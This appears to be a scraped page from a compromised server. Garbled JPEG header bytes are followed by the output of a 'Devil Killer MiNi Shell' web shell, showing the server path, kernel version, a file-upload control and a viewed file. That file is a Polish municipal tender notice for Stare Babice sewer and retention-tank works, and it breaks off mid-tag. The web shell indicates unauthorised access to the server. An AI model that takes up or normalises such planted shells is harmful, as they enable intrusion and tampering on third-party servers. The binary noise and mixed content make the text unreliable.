JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220512/0015660801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa infrastruktury kanalizacyjnej w Gminie Stare Babice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stare Babice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271855</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stare Babice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@stare-babice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://starebabice.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa infrastruktury kanalizacyjnej w Gminie Stare Babice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-38446ff7-d1f3-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00156608</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/stare_babice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/stare_babice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozdziałem IX SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarte w rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIZiF.271.18.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie zadania pn. „Rozbudowa infrastruktury kanalizacyjnej w Gminie Stare Babice” obejmującego wykonanie dokumentacji projektowej, uzgodnienie oraz budowę zbiornika retencyjnego o pojemności około 3 000 m3 wraz z niezbędną infrastrukturą, zagospodarowaniem terenu, a także uzyskaniem pozwolenia na użytkowanie. Przedmiot umowy realizowany będzie w formule „zaprojektuj wybuduj” na działce nr ew. 803/13 w Starych Babicach.<br/>2.	Przedmiot zamówienia opisany jest szczegółowo w Programie Funkcjonalno – Użytkowym (dalej „PFU”) i obejmuje wykonanie m.in. następujących czynności i robót:<br/>1)	wykonanie koncepcji zamierzenia obejmującego przedmiot umowy oraz uzyskanie akceptacji Zamawiającego i Eksploatatora, przy czym koncepcja powinna zawierać m.in. lokalizację zbiornika, jego konstrukcję w tym posadowienie oraz wymiary, lokalizację pompowni, komór, studzienek i obiektów, przebieg sieci/instalacji oraz zagospodarowanie terenu;<br/>2)	wykonanie kompletnej dokumentacji projektowej (w zakresie wszystkich branż) na podstawie koncepcji zaakceptowanej przez Zamawiającego i Eksploatatora w zakresie niezbędnym do uzyskania pozwolenia na budowę oraz realizacji budowy i oddania do użytkowania obiektu spełniającego wymagania zawarte w miejscowym planie zagospodarowania przestrzennego oraz we właściwych przepisów mających zastosowanie w przedmiocie umowy;<br/>3)	planowany w PFU zakres robót budowlanych i czynności stanowi m.in.:<br/>a)	budowę na istniejącym kanale studni rozdziału ścieków na strumień retencjonowany i strumień kierowany na oczyszczalnię,<br/>b)	budowę zbiornika ścieków komunalnych o poj. czynnej ok. 3 000 m3, żelbetowego, prostokątnego o wym. zewn. ok. 30 x 25 x 5 m, zagłębienie ok. 3,5 m p.t (zależne od warunków geotechnicznych), <br/>c)	budowę pompowni ścieków z komorą kraty zgrzebłowej oraz przylegającą komorą zasuw i przepływomierzy (instalacja podająca ścieki z kanału do zbiornika lub ze zbiornika do sieci),<br/>d)	budowę sieci między obiektowych (przewodów ściekowych grawitacyjnych i ciśnieniowych, przewodów wody technologicznej),<br/>e)	budowę kabli energetycznych i sterowniczych, w tym budowę kontenera urządzeń energetyczno-pomiarowych oraz dostawę i montaż urządzeń automatyki,<br/>f)	uruchomienie i rozruch obiektu,<br/>g)	uzyskanie pozwolenia na użytkowanie oraz przekazanie do eksploatacji wraz z niezbędną dokumentacją,<br/>h)	zagospodarowanie terenu, monitoring zewnętrzny;<br/>4)	uzyskanie i dołączenie do dokumentacji projektowej Wykonawcy warunków przyłączeniowych wszystkich koniecznych do wykonania sieci i przyłączy, projektu zagospodarowania działki oraz wszystkich wymaganych prawem opinii, uzgodnień, pozwoleń i sprawdzeń oraz informacji dotyczącej bezpieczeństwa i ochrony zdrowia – w przypadku, gdy będą wymagane, a także wykonanie dokumentacji wykonawczej oraz projektu rozruchu technologicznego;<br/>5)	wykonawca ma również obowiązek uzyskania decyzji, które nie zostały określone w PFU lub umowie, a które są wymagane w przepisach prawa w tym decyzji o środowiskowych uwarunkowaniach;<br/>6)	uzgodnienie i uzyskanie akceptacji Zamawiającego i Eksploatatora dokumentacji projektowej przed wystąpieniem o wydanie decyzji o pozwoleniu na budowę;<br/>7)	przekazanie Zamawiającemu kompletnej dokumentacji projektowej w zakresie wszystkich branż (w tym projektów wykonawczych) w formie elektronicznej w formatach – tekst pdf i docx; rysunki, schematy pdf i dwg;<br/>8)	wykonanie wszelkich badań, ekspertyz, pomiarów niezbędnych do prawidłowego wykonania dokumentacji projektowej (np.: badania geotechniczne uzupełniające w przypadku takiej konieczności) oraz uzyskanie wszelkich wymaganych przepisami prawa uzgodnień, opinii i sprawdzeń dokumentacji technicznej także nie wymienionych w niniejszej umowie, a koniecznych do prawidłowego wykonania dokumentacji projektowej i uzyskania pozwolenia na budowę oraz późniejszego wykonania robót budowalnych;<br/>9)	występowanie w imieniu Zamawiającego i/lub Eksploatatora do wszystkich urzędów, instytucji, gestorów sieci z wnioskami o wydanie uzgodnień, warunków i decyzji na podstawie pełnomocnictw (dokumenty będą wystawiane po zgłoszeniu takiej potrzeby przez Wykonawcę) w tym udzielanie odpowiedzi na wezwania/uwagi dotyczące złożonej dokumentacji, w tym jej uzupełnianie/zmianę/wykonanie dodatkowych opracowań w razie takiej konieczności;<br/>10)	złożenie wniosku i uzyskanie prawomocnego pozwolenia na budowę, w tym udzielanie odpowiedzi na postanowienia/wezwania/uwagi dotyczące złożonej dokumentacji, w tym jej uzupełnianie/zmianę/wykonanie dodatkowych opracowań w razie takiej konieczności;<br/>11)	przekazanie Zamawiającemu kompletnej dokumentacji projektowej po uzyskaniu pozwolenia na budowę w zakresie wszystkich branż (w tym projektów wykonawczych zawierających szczegółowe rozwiązania, rysunki, schematy) w co najmniej 2 egzemplarzach w formie papierowej oraz w formie elektronicznej w formatach – tekst pdf i docx; rysunki, schematy pdf i dwg;<br/>12)	sprawowanie nadzoru autorskiego we wszystkich branżach w okresie obowiązywania przedmiotu umowy w trakcie prowadzenia robót związanych z budową przedmiotu umowy:<br/>a)	nadzór autorski sprawowany będzie zgodnie ze szczegółowym zakresem obowiązków i uprawnień dotyczącym nadzoru autorskiego określonym odnośnymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane,<br/>b)	nadzór autorski kończy się wraz z wypowiedzeniem umowy przez którąkolwiek ze stron lub w momencie uprawomocnienia się pozwolenia na użytkowanie przedmiotu umowy,<br/>c)	w ramach nadzoru autorskiego autorzy projektu będą zobowiązani w szczególności do:<br/>	udziału w naradach technicznych organizowanych przez Zamawiającego lub Wykonawcę (na budowie lub w innym uzgodnionym miejscu), na których zapewni kompetentny skład specjalistów uprawnionych do podejmowania decyzji, <br/>	kontroli zgodności realizacji inwestycji z projektem w toku wykonywania robót budowlanych przez Wykonawcę,<br/>	uzgadniania możliwości i ocena zasadności wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, a zgłoszonych przez kierownika budowy, inspektora nadzoru inwestorskiego lub Zamawiającego, <br/>	wyjaśniania wszelkich wątpliwości powstałych w toku realizacji przedmiotu umowy,<br/>	udziału w odbiorze inwestycji od Wykonawcy, polegający na ocenie czy zmiany wprowadzone w trakcie wykonywania obiektu były istotne;<br/>13)	przeniesienie w ramach wynagrodzenia ryczałtowego za wykonanie przedmiotu niniejszej umowy na czas nieoznaczony na Zamawiającego autorskich praw majątkowych do projektu oraz praw majątkowych do projektu na wszelkich polach eksploatacji określonych w art. 50 ustawy z dnia 04 lutego 1994 r. o prawie autorskim i prawach pokrewnych;<br/>14)	zgłoszenie rozpoczęcia robót we właściwym organie nadzoru budowlanego;<br/>15)	organizację zaplecza budowy w uzgodnieniu z Eksploatatorem, w tym zapewnienie dostępu do mediów;<br/>16)	wyznaczenie dróg tymczasowych w uzgodnieniu z Eksploatatorem;<br/>17)	ogrodzenie terenu budowy i zabezpieczenie przed dostępem osób postronnych;<br/>18)	wykonanie wszystkich robót budowlanych i czynności wynikających dokumentacji projektowej w zakresie przedmiotu umowy, zagospodarowania terenu itp;<br/>19)	wykonanie w uzgodnieniu i z udziałem Eksploatatora/Zamawiającego rozruchu, prób oraz przekazanie do eksploatacji i użytkowania przedmiotu umowy;<br/>20)	szkolenie pracowników Eksploatatora z zasad działania, eksploatacji, konserwacji oraz innych czynności ważnych z uwagi na codzienną eksploatację;<br/>21)	całkowita obsługa geodezyjna przedmiotu umowy;<br/>22)	prowadzenie robót przez kierownika budowy oraz prowadzenie dokumentacji związanej z budową, w tym dziennika budowy zgodnie z obowiązującymi przepisami;<br/>23)	opracowanie programu BIOZ;<br/>24)	przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej, inwentaryzacji geodezyjnej powykonawczej oraz sprawozdania z rozruchu technologicznego;<br/>25)	dokonanie wszystkich wymaganych prawem zgłoszeń do właściwych organów oraz uzyskanie prawomocnej decyzji o pozwoleniu na użytkowanie;<br/>26)	uporządkowanie terenu prowadzenia robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">19 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzielenie zamówień, których przedmiot będzie polegał na powtórzeniu robót i czynności podobnych do tych, jakie stanowią przedmiot niniejszego zamówienia, a ich wartość całkowita nie przekroczy 3 500 000 zł netto i została uwzględniona w całkowitej wartości zamówienia.<br/>Ewentualny zakres tych zamówień obejmuje w szczególności: wykonanie dokumentacji, opracowań, ekspertyz, przeprowadzenia sprawdzeń, uzgodnień, przeprowadzenia postępowań w zakresie przedmiotu zamówienia a nie uwzględnionych w opisie przedmiotu zamówienia (w tym w PFU) itp. czynności, które będą niezbędne do właściwego wykonania przedmiotu zamówienia. Zakres tych zamówień obejmuje również wykonanie robót i usług w zakresie branż konstrukcyjnej, sanitarnej, elektrycznej, automatyki oraz innych w zakresie przedmiotu zamówienia a nie uwzględnionych w opisie przedmiotu zamówienia (w tym w PFU oraz wykonanej i uzgodnionej dokumentacji projektowej) itp. robót i czynności, które będą niezbędne do właściwego wykonania przedmiotu zamówienia.<br/>Zamówienia, o których mowa powyżej zostaną udzielone na warunkach określonych w odrębnej umowie, po przeprowadzeniu negocjacji z Wykonawcą zamówienia podstawowego w trybie z wolnej ręki na podstawie ustawy pzp. Decyzję w tym zakresie podejmuje Zamawiający.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużony okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna i zawodowa – Zamawiający uzna warunek za spełniony, jeżeli:<br/>1)	Wykonawca wykaże, że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej dwie roboty budowlane (w ramach odrębnych umów), polegające na budowie/rozbudowie/przebudowie (w rozumieniu definicji z ustawy Prawo budowlane) zbiornika o konstrukcji żelbetowej będącego elementem oczyszczalni ścieków, o pojemności co najmniej 1 000 m3 wraz z instalacjami i automatyką każda robota oraz<br/>2)	Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej jedną dokumentację projektową wraz z uzyskaniem decyzji o pozwoleniu na budowę/rozbudowę/przebudowę (w rozumieniu definicji z ustawy Prawo budowlane) zbiornika o konstrukcji żelbetowej będącego elementem oczyszczalni ścieków, o pojemności co najmniej 1 000 m3 wraz z instalacjami i automatyką.<br/>3)	Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy:<br/>a.	projektantem:<br/>a)	projektantem posiadającym uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane,<br/>b)	projektantem posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane oraz posiadającym doświadczenie w projektowaniu w charakterze projektanta instalacji sanitarnych co najmniej dwóch (w ramach odrębnych umów) budów/rozbudów/przebudów (w rozumieniu definicji z ustawy Prawo budowlane) zbiornika o konstrukcji żelbetowej będącego elementem oczyszczalni ścieków, o pojemności co najmniej 1 000 m3,<br/>c)	projektantem posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r Prawo budowlane oraz posiadającym doświadczenie w projektowaniu w charakterze projektanta automatyki co najmniej dwóch (w ramach odrębnych umów) budów/rozbudów/przebudów (w rozumieniu definicji z ustawy Prawo budowlane) zbiornika o konstrukcji żelbetowej będącego elementem oczyszczalni ścieków, o pojemności co najmniej 1 000 m3;<br/>b.	kierownikiem:<br/>a)	kierownikiem budowy, posiadającym uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń zgodne z ustawą z dnia 7 lipca 1994 r.,<br/>b)	kierownikiem robót sanitarnych posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane,<br/>c)	kierownikiem robót w specjalności elektrycznej i elektroenergetycznej posiadającym uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r Prawo budowlane, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z rozdziałem IV SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z rozdziałem IV SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z rozdziałem IV i XIII SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Każdy Wykonawca biorący udział w przetargu musi przed upływem terminu składania ofert wnieść wadium w wysokości 50 000 zł (słownie: pięćdziesiąt tysięcy zł) zgodnie z zasadami określonymi w rozdziale XI SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z rozdziałem VII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z Załącznikiem nr 2 do SWZ - Projektowane postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/stare_babice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span 